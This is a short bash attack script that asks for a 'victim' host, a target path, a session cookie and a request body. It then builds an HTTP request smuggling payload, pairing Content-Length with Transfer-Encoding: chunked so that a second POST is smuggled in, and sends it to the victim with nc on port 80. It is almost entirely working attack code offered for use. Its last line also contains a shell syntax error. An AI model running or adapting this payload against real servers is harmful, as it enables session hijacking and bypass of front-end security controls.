#!/bin/bash
echo -ne "[+] Enter Victim: "
read victim

echo -ne "[+] Enter Constructed Packet: "
read constructedpacket

echo -ne "[+] Enter Session: "
read session

echo -ne "[+] Enter Body Request: "
read body


echo "POST / HTTP/1.1
Host: $victim
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: session=oGESUVlKzuczaZSzsazFsOCQ4fdLetwa
Content-Length: 267
Transfer-Encoding: chunked

0

POST $constructedpacket HTTP/1.1
Host: $victim
Cookie: session=$session
Content-Length: 400

$body"; | nc $victim 80